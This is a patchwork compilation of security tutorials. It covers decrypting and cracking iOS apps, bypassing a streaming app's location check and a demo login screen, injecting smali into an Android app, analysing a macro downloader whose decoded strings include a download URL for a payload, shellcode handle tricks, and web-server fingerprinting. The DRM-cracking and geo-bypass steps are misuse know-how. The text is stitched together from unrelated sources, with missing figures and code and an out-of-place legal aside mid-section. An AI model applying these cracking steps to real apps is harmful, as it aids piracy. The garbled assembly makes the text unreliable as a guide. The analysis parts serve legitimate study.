Reverse Engineering iPhone
Applications
Why should I reverse engineer an iOS App?
Requirements:
First of all you need to have a jailbroken iPad or iPhone/iPod. In my case I use an iPad 4 running iOS 8, jailbroken with Pangu. To follow this tutorial you also need some Cydia packages installed. To disassemble the file on your computer/Mac you will need Hopper (http://www.hopperapp.com).
Rasticrac
You need to have Rasticrac installed because every iOS binary is encrypted with FairPlay DRM. Rasticrac is an easy-to-use tool that decrypts the iOS binary; otherwise you cannot disassemble it with Hopper.
Repo Source
You can install Rasticrac with Cydia; just add the following repo source in Cydia:
http://cydia.iphonecake.com
Now just search for it and install it.
Ldone
With ldone you can re-sign the iOS binary so that you will be able to run it after modifying it.
Repo Source
NewTerm
You need to have NewTerm installed to set up Rasticrac and ldone. Just search for NewTerm in Cydia and install it; you will find it in the already-added iPhoneCake repo.
rasticrac.sh -m
The Rasticrac menu will be shown. Rasticrac will list the apps installed on your device, each with a number or a letter. You have to enter the corresponding letter/number for the app you want to decrypt.
Example: m: Clash of Clans
In this case you have to enter m if you want to decrypt the Clash of Clans binary.
Rasticrac will put the decrypted .ipa of the App in:
/var/root/Documents/Cracked
Now you can see the disassembly of the iOS binary, and you can make changes to the binary!
The most difficult and time consuming part is recognizing the classes and the
objects used to call required methods. The traditional approach is to perform a
class dump of the binary to get the methods that can be invoked.
We can use 'Crackulous' to dump out the unencrypted version of the application
and use 'class-dump-z' to spit out the method names present in the _OBJC
segment. There are also a couple of tools (iNalyzer and Snoop-it) that save a
lot of time and perform reverse engineering and function hooking for the entire
application.
I have analyzed the TWCSportsNet application here. The reason why I chose this application is that it has two security controls implemented. It does not work if the following conditions are not met:
We will bypass those restrictions by using two modern tools called iNalyzer
and Snoop-it.
iNalyzer:
Limits of iNalyzer:
It does not let us dynamically analyze the work flow of the application. For
example, if we click a send button on an iOS application, we do not get to see
the classes and the various methods that will be invoked.
The location has been updated and sent to the server through an HTTP request
which sends my current latitude and longitude. We can trace the calls and
corresponding methods when any kind of activity is performed by enabling the
Method Tracing Functionality.
The request can be intercepted and by changing the longitude and latitude to a
location in Los Angeles, we can view live television and bypass the location
restriction. Although this could be performed directly via manipulation of
parameters via a proxy, Snoop-it and iNalyzer give us an in-depth view of
the inner functionality of the application.
There are various other functionalities like monitoring the file system, checking
out stored values in keychains and looking at the network traffic which can
come in handy to save time during penetration testing of iOS applications.
Reverse Engineering Integral iOS
Applications
Today I will show you how to bypass a log-in screen in an iOS application. To show you how it works we will need a little iOS demo app made by me. In the demo application there is a working log-in view, and to get to what I call the "secret ViewController" you have to enter a username and a password (that you don't know!). We will modify the app so that you can get to the "secret ViewController" without entering a username or password!
Requirements
You need a jailbroken iOS device (I use an iPad 4 running iOS 8.0, jailbroken with Pangu). You also need some Cydia packages installed to follow this tutorial.
NewTerm
NewTerm is a mobile terminal; you will need it to set up ldone for re-signing the iOS binary.
ldone
With ldone you can re-sign the modified (modded) iOS binary, so you can run a manipulated binary on your jailbroken iDevice. You can find it in the http://repo.insanelyi.com repository (just add it in Cydia).
Hopper
Hopper is a reverse engineering tool for Mac/PC; you can disassemble the decrypted iOS binary with it. You can buy Hopper at http://hopperapp.com/.
To get the binary, open iFile on your iDevice and start the web server. After you have done this, open Safari on your Mac/PC and enter the IP address of your iDevice (in my case it was http://192.168.178.36:10000 or http://YouriPad.local:10000). Now you should see something like this:
Now navigate to /var/mobile/Containers/Bundle/Application/[app name]/LOGINVIEW.app (in my case [app name] was 2974EF19-3D00-4B19-B74B-D7819BD7BD20, but it differs on every device). You should see something like this:
So we know that the app "jumps" to 0xa904 if the username and the password are correct, and it "jumps" to 0xa9d2 if the login credentials are wrong. So what we have to do now is to modify the program flow in such a way that when the wrong login credentials are entered, the app also "jumps" to 0xa904. That's really easy: we just have to modify this line in [ViewController login_action]:
After you have modded the binary, go to your iDevice, open iFile, navigate to the LOGINVIEW.app folder and delete the old binary. Now start the iFile web server again, navigate to the same folder from your Mac and upload the new binary. Copy the file path of LOGINVIEW for pasting into NewTerm on your iDevice (in my case it was:
/var/mobile/Containers/Bundle/Application/2974EF19-3D00-4B19-B74B-D7819BD7BD20/LOGINVIEW.app)
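The re-signing command itself is not shown in the original. ldone follows the ldid conventions, so a typical run in NewTerm, assuming the path above, would look something like this:

cd /var/mobile/Containers/Bundle/Application/2974EF19-3D00-4B19-B74B-D7819BD7BD20/LOGINVIEW.app
ldone LOGINVIEW -s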
Now run "LOGINVIEW". Open the log-in app and press the "OK" button without entering anything as a username or a password; if you followed the instructions, you will now see a "successfully hacked it!" screen message.
Summary
A lot of the new data sources that have shown up include the ability to dump the user's photo album, copy their MMS or SMS databases, their notes, their address book, screenshots of their activity, their keyboard typing cache (which comes from autocorrect), and a number of other personal artifacts of data. These should never come off the phone except for backup. The problem with these mechanisms now is that they've grown so large, they're dumping a lot of data, and they bypass backup encryption.
When users have their phone connected to their desktop, they can turn on backup encryption and enter a password. That tells the phone that anything which comes off of the phone as a backup must be encrypted. If I turn encryption on for my personal device and then run a backup in iTunes, that backup is completely encrypted and protected. However, when you use these interfaces that I've been discussing, that backup encryption is bypassed.
It may be due to sloppy engineering, or some other decision Apple made; I can't speculate as to why. All I can really say is that because of that mechanism, because of that one reality, it can be very dangerous. You can use this mechanism not only to pull personal data off, you can also bypass the encryption wirelessly in a number of cases. It really opens up various security concerns for a specific set of threat models.
Reverse Engineering Android
Applications
Reverse engineering Android applications can be really fun and give you decent knowledge of the inner workings of the Dalvik Virtual Machine. This post will be an all-out, start-to-finish, beginners* tutorial on the tools and practices of reverse engineering Android through the disassembly and code injection of the Android Hello World application.
*Beginner means that you know a bit about Android and Java in general; if not, learn a bit first and come back. Experience in the terminal environment on your machine is also probably necessary.
THE APK
In order to start reverse engineering, you must first understand what you're working with. So what exactly is an apk? (Hint: not American Parkour.) An Android package, or apk, is the container for an Android app's resources and executables. It's a zipped file that simply contains:
classes.dex
AndroidManifest.xml
res/
lib/ (sometimes)
META-INF/
The meat of the application is the classes.dex file, or the Dalvik executable (get it, dex?) that runs on the device. The application's resources (i.e. images, sound files) reside in the res directory, and the AndroidManifest.xml is more or less the link between the two, providing some additional information about the application to the OS. The lib directory contains native libraries that the application may use via the NDK, and the META-INF directory contains information regarding the application's signature.
You can grab the HelloWorld apk we will be hacking here. The source to this
apk is available from the developer docs tutorial.
THE TOOLS
In order to complete this tutorial, you'll need to download and install the following tools:
apktool
jarsigner
keytool
$ cd ~/Desktop/HelloWorld
Execution of the apktool binary without arguments will give you its usage, but we will only use the d (decode) and b (build) command-line options for this tutorial. Decode the apk using the apktool d option:
$ apktool d HelloWorld.apk
This will tell the tool to decode the assets and disassemble the .dex file in the
apk. When finished, you will see the ./HelloWorld directory, containing:
res/ (decoded)
smali/
apktool.yml
$ ls HelloWorld/smali/com/test/helloworld/
HelloWorldActivity.smali R$attr.smali R$drawable.smali R$layout.smali R$string.smali R.smali
Compare this with the app's Java source, which consists only of:
HelloWorldActivity.java
R.java
where R.java contains inner classes attr, string, and so on. It's evident that HelloWorldActivity is the activity that's displayed when the app launches, so what exactly is R?
Let's break down what's going on in the Java first. We define our HelloWorldActivity class that extends android.app.Activity, and within that class, override the onCreate() method. Inside the method, we create an instance of the TextView class and call the TextView.setText() method with our message. Finally, we set the view by calling setContentView(), passing in the TextView instance.
In smali, we can see that we have a bit more going on, so let's break it up into sections. The constructor has seemingly appeared out of nowhere, but it was really inserted by the compiler because we extended another class. You can see that the virtual machine is to make a direct invocation of the superclass's constructor; this follows the nature of subclasses, which must call their superclass's constructor.
Data Types
In the onCreate() method, we can see that the smali method definition isn't that far off from its Java counterpart. The method's parameter types are defined within the parentheses (semicolon separated) with the return type discreetly placed on the end of the .method line. Object return types are easy to recognize, given that they begin with an L and are written in full namespace form. Java primitives, however, are represented as capital chars and follow this format:
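The primitive type descriptors, as defined by the standard Dalvik bytecode documentation, are:
V = void
Z = boolean
B = byte
S = short
C = char
I = int
J = long (64-bit)
F = float
D = double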
So for our onCreate() definition in smali, we can expect a void return value.
Registers
Moving one line down, on line 20 we see the .locals directive. This
determines how many registers the Dalvik vm will use for this
method_without_ including registers allocated to the parameters of the
method. Additionally, the number of parameters for any virtual method will
always be the number of input parameters + 1. This is due to an implicit
reference to the current object that resides in parameter register 0 or p0 (in
java this is called the this reference). The registers are essentially
references, and can point to both primitive data types and java objects. Given
2 local registers, 1 parameter register, and 1 this reference, the onCreate()
method uses an effective 4 registers.
For convenience, smali uses a v and p naming convention for local vs.
parameter registers. Essentially, parameter (p) registers can be represented by
local (v) registers and will always reside in the highest available registers.
For this example, onCreate() has 2 local registers and 2 parameter registers, so
the naming scheme will look something like this:
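The table itself was not reproduced here; applying the rules above (the two locals first, then the parameter registers in the highest slots), the mapping would be:
v0 - first local register
v1 - second local register
v2 = p0 - the implicit "this" reference
v3 = p1 - the savedInstanceState Bundle parameter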
Opcodes
Dalvik opcodes are relatively straightforward, but there are a lot of them. For the sake of this post's length, we'll only go over the basic (yet important) opcodes found in our example HelloWorldActivity.smali: essentially invoke-super, new-instance, invoke-direct, const-string, invoke-virtual, and return-void. Now, suppose we want to inject the following call into onCreate():
Toast.makeText(getApplicationContext(), "Hacked!",
Toast.LENGTH_SHORT).show();
How do we do this in smali? Easy: let's just compile this into another application and disassemble it. The end result is something like this:
Now, let's ensure we have the right number of registers in our original onCreate() to support these method calls. We can see that the highest register in the code we want to patch is v3, which we have, but it will require us to overwrite both of our parameter registers. Given we won't be using either of those registers after setContentView(), this number is appropriate. Our final patched HelloWorldActivity.smali should look like:
$ apktool b ./HelloWorld
This will instruct apktool to rebuild the app; however, the rebuilt app will not be signed. We will need to sign the app before it can be successfully installed on any device or emulator.
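The signing commands are not shown in the original. With the keytool and jarsigner utilities listed earlier, a typical sequence looks like this (the keystore name and alias are placeholders; you will be prompted for passwords, and apktool b writes the rebuilt apk to the project's dist/ directory):

$ keytool -genkey -v -keystore debug.keystore -alias androiddebugkey -keyalg RSA -keysize 2048 -validity 10000
$ jarsigner -verbose -keystore debug.keystore HelloWorld/dist/HelloWorld.apk androiddebugkey
$ adb install HelloWorld/dist/HelloWorld.apk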
Then you're done! Install the app onto your device or emulator.
Malware Analysis
Once you have understood the basics of reverse engineering you can move on
to malware analysis.
The most important thing while analyzing malware is to prevent infection of your own hardware and software. The samples we use are real, and improper handling may result in pretty nasty infections.
You need:
knowledge of programming.
an OS different from Windows for your main system. I recommend Linux. The malware samples we use are targeted at Windows systems, so using another system is the safest choice for you.
for the future, but not for this tutorial: a virtual machine, e.g. VMWare or VirtualBox. Create a VM with any Windows OS on it, so you can test samples.
If it is for any reason impossible for you to use a Linux system, you must take
other precautions. Accidentally running the sample by command line or
clicking can happen very easily. So:
Never use an executable file extension for a sample; e.g., instead of .exe use .ex1.
Save the sample in a folder with permissions that disallow running
the file.
First Observations:
Now you have a file, but you don't know what kind of file it is. The file type is
the most important thing to start with. I usually open a file in a hex editor to
take a look at it.
Another part of research, which I often use: Check if the file is listed on
Virustotal. Use the command sha256sum on Linux to get the hash value and
search by hash.
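For example (the sample filename is hypothetical, and the hash shown is a placeholder):

$ sha256sum sample.ex1
<64-hex-character hash>  sample.ex1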
Virustotal does not only list detections, it also shows lots of additional
information about the file, depending on the filetype.
You can of course also upload the file, but sometimes there are reasons not to
do so. E.g. the file might contain private information that shouldn't be available
on the web.
Now let's use a hex editor. It can be any of your choice. For Linux I use Bless.
Scroll a bit through the file and see if you recognize any strings.
At some point you might see this:
The Code
Luckily there are some tools out there that help to reverse engineer these documents.
Download the most recent zip of oletools from
here: https://bitbucket.org/decalage/oletools/downloads
These are Python tools, which you use from the command line. Their purpose can be found here: http://www.decalage.info/en/book/export/html/79
Use olevba to extract any macro code from the word document:
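The command line itself is missing here; with the olevba script from oletools, extracting the output to a file would look like this (the document name is a placeholder):

$ olevba suspicious.doc > vba_extracted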
This will save the result in vba_extracted. Open vba_extracted in a text editor. You will see a lot of code that does not look very useful. The code has, in fact, a slight obfuscation: most commands are clutter.
Have a look at the very end of the text file. You will find a table with a
summary, which was done by olevba. This is a very useful summary as it
points you to important parts of the code. Now search for the string "Environ"
in the file.
There you can see some interesting hex strings. To get the meaning of these hex strings, open a terminal and the Python interpreter. We save one of the strings in a variable:
"568756E2E69626F237A6F2D6F636E24756E6F686361666F2F2A307474786"
The VBA macro reverses the string, so we do the same. The last step is to transform this hex representation into a readable string. For the shortest of the strings, the whole chain looks like this:
"05D45445"[::-1].decode("hex")
The result will show you a download path for an executable. Warning: even if it is tempting, you must not visit a website found in malicious files! But you may do some additional research with whois.
You will get the following strings:
hxxp://fachonet.com/js/bin.exe
\\YEWZMJFAHIB.exe
TEMP
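Note that .decode("hex") is Python 2 syntax. On Python 3 the same decoding, shown here as a sketch, would be:

# Python 3 equivalent of the Python 2 one-liner above
print(bytes.fromhex("05D45445"[::-1]).decode("ascii"))   # prints TEMP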
Obviously this document is a downloader, which saves the downloaded file as
YEWZMJFAHIB.exe in the TEMP directory.
Search for some of the other keywords shown in the table at the bottom and
explore the code. You will find the code that writes the file to disk and the part
that runs it.
That was the first malware analysis tutorial. Macro malware seemed dead for a while, but a new wave of it has popped up again. Office documents are usually
droppers or downloaders, which means they are the initial carriers for
infection with malware.
Reverse Engineering Linux
Malware
REMnux is a free, lightweight, Ubuntu-based Linux toolkit for reverse-engineering malicious software. REMnux provides a collection of some of the most common and effective tools used for reverse-engineering malware.
Each automated malware analysis tool uses different backend systems to run
the malware in a controlled environment. Malware can be run in physical
machines or virtual machines. Note that old unused physical machines lying
around at home would be a perfect candidate for setting up a malware analysis
lab, which would make it considerably more difficult for malware binaries to
determine whether they are being executed in a controlled environment. When
building our own malware analysis lab, we have to connect multiple machines
together to form a network, which can be done simply by a virtual or
physical switch, depending on the type of machines used.
Each cloud automated malware analysis service uses some kind of
virtualization environment to run its malware samples, like Qemu/KVM,
VirtualBox, VMWare, etc. Depending on the virtualization technology being
used, a malware sample can use different techniques to detect that it's being
analyzed and terminate immediately. The malware sample will then not be
flagged as malicious, since it terminated preemptively without executing the
malicious code.
In this section we've seen that different cloud malware analysis services use
different virtualization technologies to run submitted malware samples. As far
as I know, only Joe Sandbox has an option of running malware samples on
actual physical machines, which prevents certain techniques from being used in
malware samples to detect if they are being run in an automated malware
analysis environment. Still, there are many other techniques a malware can use
to detect if it's being analyzed.
This is a cat and mouse game, where new detection techniques are invented
and used by malware samples on a daily basis. On the other hand, there are
numerous anti-detection techniques used to prevent the malware from
determining it's being executed in an automated malware analysis environment.
When a new detection technique appears, usually a new anti-detection
technique is put together to render the detection technique useless.
Each service supports only a fraction of all file formats and document types in
which malicious code can be injected. Therefore, depending on the file we
have to analyze, we can use the services that support its corresponding file
format or document type.
In order to analyze a document, we have to choose the appropriate service.
Since there are many techniques an attacker can use to determine whether the
malicious payload is being executed in an automated malware analysis
environment, some malicious samples won't be analyzed correctly, resulting
in false negatives. Therefore, such services should only be
used together with a reverse engineer or malware analyst in order to manually
determine whether the file is malicious or not. Since there are many malicious
samples distributed around the Internet on a daily basis, every sample cannot
be manually inspected, which is why cloud automated malware analysis
services are a great way to speed up the analysis.
The Future
Weaponized documents (I really hate this name!) are just another method used
by bad guys to deliver a malicious payload. Recently this technique was used by
criminal groups delivering banking trojans (e.g. Dridex), but as you might
expect it was also used by APT actors (e.g. Rocket Kitten in Operation Woolen
Goldfish). Regardless of the threat type (APT, commodity, etc.) analysis of the
malicious documents should be an essential skill of every analyst.
Other objects that you might encounter in OLE files are macros. Macros
allow you to automate tasks and add functionality to your documents, like
reports, forms, etc. Macros can use Visual Basic for Applications (VBA),
which is where bad guys will often try to hide their malicious code. This is
what we are after in this handbook - finding and extracting malicious code
from OLE files!
Code deobfuscation
There is never a one-size-fits-all solution to deobfuscating code. A good
thing to start with is to clean up the code from randomly generated variable
names. For this, just open the code in any text editor and use the
find-and-replace feature to rename randomly named variables to something
more readable, as in the sketch below.
I like to rename variables so they start with a capital letter informing me
about the variable type.
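A quick way to do this in bulk is a small Python script. A minimal sketch,
assuming the extracted macro sits in vba_extracted; the obfuscated names in
the mapping are made up for illustration and would be filled in by hand:

import re

# Hand-built mapping from obfuscated names to readable ones
renames = {
    "qjzxkwpf": "StrDownloadUrl",
    "mmnbvcxz": "ObjShell",
}

with open("vba_extracted") as f:
    code = f.read()

for old, new in renames.items():
    # \b ensures we only replace whole identifiers, not substrings
    code = re.sub(r"\b%s\b" % re.escape(old), new, code)

with open("vba_cleaned.vba", "w") as f:
    f.write(code)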
It's never a good idea to rely on only one tool. Analyzing malicious
documents is all about finding, extracting, and analyzing malicious code.
What would happen if the bad guys used different obfuscation methods or
document types, or came up with a new, unknown technique? Would you be
prepared with your current toolset? Having a backup plan and additional
tools in your toolset makes you ready for such a scenario. In our short
analysis, OfficeMalScanner was not able to extract both streams correctly.
What if this was your go-to tool? Would you be able to perform the analysis?
I am not saying that any tool described in this book is better or worse than
the others; all of them are great tools that let you do things differently,
and it all really depends on your requirements.
For instance, officeparser.py and oledump.py allow you to interact with the
file internals; however, this might not be the most efficient approach if you
have to analyze a batch of documents, where writing a loop and dumping the
malicious code will do the trick for you.
The shellcode may be designed to search for a second-stage payload or other
embedded artifacts elsewhere in the originating file. This may be the case if
the buffer being exploited was limited in size: the malware author may have
placed the secondary-stage shellcode, or perhaps even an embedded
obfuscated executable, elsewhere in the document within a buffer that has
significantly greater capacity.
In order to locate the specific offset within the document at which the
secondary-stage code resides, the shellcode may try to locate itself either
in memory or on the hard drive and then use the known offset to the next
piece of code to reference, extract, and execute it. One way this can be
achieved (that I've recently seen) is by identifying and making use of the
handle which refers to the document from which the shellcode originated,
which would typically have been created by the program which loaded the
file. A popular way to find the handle is to iterate through all possible
handle values, making use of the Microsoft Windows GetFileSize API call,
which is designed to return the file size related to the specified handle.
As the author knows the expected size of their malicious document, they are
able to hard-code this in, enabling this process to take place. Therefore,
it doesn't matter where on the hard drive or in memory the malicious
document resides.
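To make the trick concrete, here is a sketch of the handle brute-force in
Python with ctypes, purely for illustration (real shellcode does this in
assembly); the expected size constant is hypothetical:

import ctypes
from ctypes import wintypes

kernel32 = ctypes.windll.kernel32                    # Windows only
kernel32.GetFileSize.restype = wintypes.DWORD
kernel32.GetFileSize.argtypes = [wintypes.HANDLE,
                                 ctypes.POINTER(wintypes.DWORD)]

INVALID_FILE_SIZE = 0xFFFFFFFF
EXPECTED_SIZE = 231424   # hypothetical: the hard-coded size of the document

# Windows handle values are multiples of 4; walk a plausible low range
for handle in range(4, 0x1000, 4):
    size = kernel32.GetFileSize(handle, None)
    if size != INVALID_FILE_SIZE and size == EXPECTED_SIZE:
        print("candidate handle to the originating document: 0x%x" % handle)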
Ethical Reverse Engineering
There are two basic legal defenses associated with reverse engineering:
Claim that the idea is not novel and is an obvious step for anyone
experienced in the particular field.
Make a subtle change and claim that the changed product is not
protected by patent.
In a clean-room approach, one party examines the product and writes a
description of it; a second party then builds a product from the given
description. This product might achieve the same end effect but will
probably have a different solution approach.
At this point, you would encounter issues if the shellcode was being run
from a new file. In the case of a malicious RTF, this could be an OLE object
extracted using RTFScan rather than the original file, which would inevitably
have a different size from the original document. Therefore the handle to the
original document would not be found in the context of the process, the
referencing of embedded artifacts would fail, and this would hinder our
analysis.
A potential solution would be to create a handle to the original file within the
newly formed process, as this would allow the shellcode to make reference to
the original document and extract the data it requires. Without the source code
to MalHost-Setup, this is slightly more difficult, but we can achieve this using
a capability built into Windows which allows handles from a parent process to
be inherited by any child processes launched. The steps to achieve this are
listed below, with a sketch after the list.
1. Create a handle to a file using the 'CreateFile' API call
2. Launch a new process using the 'CreateProcess' API call,
specifying the security parameters to enable the child to inherit the
parent's handles.
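A minimal sketch of those two steps in Python with ctypes (the document and
executable names are placeholders; MalHost-Setup's output is assumed to be
malhost_out.exe):

import ctypes
import subprocess
from ctypes import wintypes

kernel32 = ctypes.windll.kernel32                    # Windows only

class SECURITY_ATTRIBUTES(ctypes.Structure):
    _fields_ = [("nLength", wintypes.DWORD),
                ("lpSecurityDescriptor", ctypes.c_void_p),
                ("bInheritHandle", wintypes.BOOL)]

kernel32.CreateFileW.restype = wintypes.HANDLE
kernel32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD,
                                 wintypes.DWORD, ctypes.c_void_p,
                                 wintypes.DWORD, wintypes.DWORD,
                                 wintypes.HANDLE]

GENERIC_READ = 0x80000000
FILE_SHARE_READ = 0x00000001
OPEN_EXISTING = 3

# 1. Create an inheritable handle to the original document
sa = SECURITY_ATTRIBUTES(ctypes.sizeof(SECURITY_ATTRIBUTES), None, True)
handle = kernel32.CreateFileW(u"original.doc", GENERIC_READ, FILE_SHARE_READ,
                              ctypes.byref(sa), OPEN_EXISTING, 0, None)

# 2. Launch the extracted shellcode host; close_fds=False makes Python call
#    CreateProcess with bInheritHandles=TRUE, so the child sees our handle
subprocess.Popen(["malhost_out.exe"], close_fds=False)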
We have created our own malware lab with some basic tools. Now we're
going to use someone else's sandbox. The automated analysis provided by
Malwr.com has been tremendously useful in the short time that I have been
using it. It's a great tool for getting things done quickly. Keep in mind
that even though a lot of the essentials are automated here, we'll stick to
a more manual approach later on.
Word Doc Sandbox
The first stage of the malware is the malicious resume that we received. Now,
many sandboxes are built specifically for executables, but there are
exceptions. One such exception is Xec-Scan which handles Word documents.
Submitting our sample to Xec-Scan gives us something we had already
discovered: the domain to which the malware calls.
Using these results, it's easier to narrow down what happens when and focus
on points of interest. For example, maybe we are worried about a keylogger.
The hooking part of the timeline could give us an idea of when or if the
malware is hooking our keyboard to gather keystrokes. Registry persistence is
another worry. Just take a look at the registry calls to see if there is anything
that we might be interested in.
The last thing I found interesting was the dropped files tab. We can see our
lamprey dll there, as well as a tmp file. What do these do, how are they used?
Our Own Automated Sandbox
Sometimes, for whatever reason, we may not want to share these files with
others. This could be proprietary research, it could be that you have created
your own malware, or perhaps you have something that you don't want to be
out in the public. Luckily, there are tools available to build your own. If you
liked Malwr.com, Cuckoo Sandbox is probably the tool for you. Malwr.com is
built on top of Cuckoo. You could also take the environment from the original
post and expand that to fit your needs.
Where Do We Fit It In?
With all this information that we gained from this automated tool, what's the
point in learning about malware analysis? One thing malware can do is detect
and avoid analysis, so for all we know it was designed to do nothing in this
kind of environment. So maybe we aren't getting the full picture from these
tools. We also know it didn't call out when this was run, so what did it do?
There are a lot of questions that I got from looking at the results, so taking a
deeper look could prove useful. I also have found a lot of value in learning
some of these tools as there is definite carry-over knowledge in other Infosec
areas. Being able to use IDA proficiently will hopefully help me
in vulnerability research. Setting up this environment has made me more
cautious about handling malware. I am learning about Windows internals,
which has been useful in some tool writing I have done. Even if the automated
tools are all you need, I hope that you can find some value in learning to
reverse engineer malware. I know I have.
The Penetration Testing Of Web
Applications
A penetration test is a method of evaluating the security of a computer system
or network by simulating an attack. A Web Application Penetration Test
focuses only on evaluating the security of a web application.
The process involves an active analysis of the application for any weaknesses,
technical flaws, or vulnerabilities. Any security issues that are found will be
presented to the system owner together with an assessment of their impact and
often with a proposal for mitigation or a technical solution.
Vulnerabilities
Enumerating the application and its attack surface is a key precursor before
any attack should commence. This section will help you identify and map out
every area within the application that should be investigated once your
enumeration and mapping phase has been completed.
Application Discovery
User-agent: *
Allow: /searchhistory/
Disallow: /news?output=xhtml&
Allow: /news?output=xhtml
Disallow: /search
Disallow: /groups
Disallow: /images
...

User-agent: *
...
Disallow: /search
Disallow: /groups
Disallow: /images
...
The robots.txt file is retrieved from the web root directory of the web
server. For example, to retrieve the robots.txt from www.google.com using
wget:
$ wget http://www.google.com/robots.txt
--23:59:24--  http://www.google.com/robots.txt
           => 'robots.txt'
Google Webmaster Tools can also analyze a site's robots.txt: on the
Dashboard, click the URL for the site you want.
Once the GoogleBot has completed crawling, it commences indexing the web
page based on tags and associated attributes, such as <TITLE>, in order to
return the relevant search results. [1]
If the robots.txt file is not updated during the lifetime of the web site, then it is
possible for web content not intended to be included in Google's Search
Results to be returned.
Google provides the Advanced "cache:" search operator, but this is the
equivalent of clicking the "Cached" link next to each Google Search Result.
Hence, the use of the Advanced "site:" Search Operator and then clicking
"Cached" is preferred.
The Google SOAP Search API supports the doGetCachedPage and the
associated doGetCachedPageResponse SOAP Messages to assist with
retrieving cached pages.
Entry Points
Enumerating the application and its attack surface is a key precursor before
any thorough testing can be undertaken, as it allows the tester to identify
likely areas of weakness. This section aims to help identify and map out
areas within the application that should be investigated once enumeration
and mapping has been completed.
Before any testing begins, always get a good understanding of the application
and how the user/browser communicates with it. As you walk through the
application, pay special attention to all HTTP requests (GET and POST
Methods, also known as Verbs), as well as every parameter and form field
that are passed to the application. In addition, pay attention to when GET
requests are used and when POST requests are used to pass parameters to the
application. It is very common that GET requests are used, but when sensitive
information is passed, it is often done within the body of a POST request.
Note that to see the parameters sent in a POST request, you will need to use a
tool such as an intercepting proxy (for example, OWASP's WebScarab) or a
browser plug-in. Within the POST request, also make special note of any
hidden form fields that are being passed to the application, as these usually
contain sensitive information, such as state information, quantity of items, the
price of items, that the developer never intended for you to see or change.
The proxy will keep track of every request and response between you and the
application as you walk through it. Additionally, at this point, testers usually
trap every request and response so that they can see exactly every header,
parameter, etc. that is being passed to the application and what is being
returned. This can be quite tedious at times, especially on large interactive
sites (think of a banking application). However, experience will teach you
what to look for, and, therefore, this phase can be significantly reduced. As
you walk through the application, take note of any interesting parameters in the
URL, custom headers, or body of the requests/responses, and save them in
your spreadsheet. The spreadsheet should include the page you requested (it
might be good to also add the request number from the proxy, for future
reference), the interesting parameters, the type of request (POST/GET), if
access is authenticated/unauthenticated, if SSL is used, if it's part of a multi-
step process, and any other relevant notes. Once you have every area of the
application mapped out, then you can go through the application and test each
of the areas that you have identified and make notes for what worked and what
didn't work.
Requests:
Identify where GETs are used and where POSTs are used.
Responses:
The following are two examples of how to check for application entry points.
EXAMPLE 1:
This example shows a GET request that would purchase an item from an online
shopping application.
GET https://x.x.x.x/shoppingApp/buyme.asp?
CUSTOMERID=100&ITEM=z101a&PRICE=62.50&IP=x.x.x.x
Host: x.x.x.x
Cookie:
SESSIONID=Z29vZCBqb2IgcGFkYXdhIG15IHVzZXJuYW1lIGlzIGZvbyBhbm
Result Expected:
Here you would note all the parameters of the request such as CUSTOMERID,
ITEM, PRICE, IP, and the Cookie (which could just be encoded parameters or
used for session state).
EXAMPLE 2:
This example shows a POST request that would log you into an application.
Host: x.x.x.x
Cookie:
SESSIONID=dGhpcyBpcyBhIGJhZCBhcHAgdGhhdCBzZXRzIHByZWRpY3Rh
MTIzNA==
CustomCookie=00my00trusted00ip00is00x.x.x.x00
user=admin&pass=pass123&debug=true&fromtrustIP=true
Result Expected:
In this example you would note all the parameters as you have before but
notice that the parameters are passed in the body of the message and not
in the URL. Additionally note that there is a custom cookie that is being
used.
Web Server Finger Printing
Web server fingerprinting is a critical task for the penetration tester.
Knowing the version and type of a running web server allows testers to
determine known vulnerabilities and the appropriate exploits to use during
testing.
There are several different vendors and versions of web servers on the
market today. Knowing the type of web server that you are testing
significantly helps in the testing process, and will also change the course of
the test. This information can be derived by sending the web server specific
commands and analyzing the output, as each version of web server software
may respond differently to these commands. By knowing how each type of
web server responds to specific commands and keeping this information in a
web server fingerprint database, a penetration tester can send these
commands to the web server, analyze the response, and compare it to the
database of known signatures. Please note that it usually takes several
different commands to accurately identify the web server, as different
versions may react similarly to the same command. Rarely, however, different
versions react the same to all HTTP commands. So, by sending several
different commands, you increase the accuracy of your guess.
The simplest and most basic form of identifying a Web server is to look at the
Server field in the HTTP response header. For our experiments we use netcat.
Consider the following HTTP Request-Response:
$ nc 202.41.76.251 80
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server: Apache/1.3.3 (Unix) (Red Hat/Linux)
ETag: "1813-49b-361b4df6"
Accept-Ranges: bytes
Content-Length: 1179
Connection: close
Content-Type: text/html
From the Server field, we understand that the server is likely Apache,
version 1.3.3, running on the Linux operating system.
HTTP/1.1 200 OK
Server: Apache/1.3.23
ETag: 32417-c4-3e5d8a83
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: text/HTML
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Type: text/HTML
Accept-Ranges: bytes
Content-Length: 7369
HTTP/1.1 200 OK
Server: Netscape-Enterprise/4.1
Content-type: text/HTML
Accept-ranges: bytes
Connection: close
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-length: 1186
Content-type: text/html
Accept-Ranges: bytes
Connection: close
Date: Mon, 16 Jun 2003 02:41:27 GMT
Server: Unknown-Webserver/1.0
Connection: close
In this case, the server field of that response is obfuscated: we cannot know
what type of web server is running.
Protocol behavior
The first method consists of observing the ordering of the several headers
in the response. Every web server has an inner ordering of the header. We
consider the following answers as an example:
$ nc apache.example.com 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Apache/1.3.23
Accept-Ranges: bytes
Content-Length: 196
Connection: close
Content-Type: text/HTML
$ nc iis.example.com 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Content-Location: http://iis.example.com/Default.htm
Accept-Ranges: bytes
Content-Length: 133
Response from Netscape Enterprise 4.1:
$ nc netscape.example.com 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Netscape-Enterprise/4.1
Content-type: text/HTML
Content-length: 57
Accept-ranges: bytes
Connection: close
$ nc sunone.example.com 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-length: 0
Content-type: text/html
Connection: close
We can notice that the ordering of the header fields (in the full responses,
the position of the Date field relative to the Server field) differs between
Apache, Netscape Enterprise, and IIS. Another useful test is to observe how
each server reacts to malformed requests, such as a bogus HTTP version
(HTTP/3.0) or a nonsense protocol string (JUNK/1.0):
$ nc apache.example.com 80
GET / HTTP/3.0
